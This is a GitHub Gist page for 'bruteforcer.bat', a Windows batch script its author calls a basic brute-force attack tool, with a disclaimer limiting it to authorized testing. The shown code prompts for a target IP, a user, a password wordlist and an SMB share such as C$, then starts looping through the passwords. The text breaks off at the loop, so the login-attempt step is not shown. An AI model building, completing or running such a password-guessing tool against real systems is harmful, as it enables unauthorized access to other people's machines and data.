Skip to content

Instantly share code, notes, and snippets.

View NoNameWhatsoeverPY's full-sized avatar

NoNameWhatsoeverPY

View GitHub Profile
@NoNameWhatsoeverPY
NoNameWhatsoeverPY / bruteforcer.bat
Last active May 27, 2025 10:16
Basic Brute Force Attack Tool. Only works on windows. Disclaimer: This tool is intended strictly for educational purposes, cybersecurity research, or authorized penetration testing with the explicit consent of the system owner. Unauthorized use is illegal and unethical. The developer assumes no responsibility for any misuse or illegal activities…
@echo off
setlocal enabledelayedexpansion
set /p ip="Enter host IP: "
set /p user="Enter user: "
set /p wordlist="Enter passlist (path to .txt): "
set /p share="Enter share name (e.g., C$, shared): "
for /f %%a in (%wordlist%) do (
set pass=%%a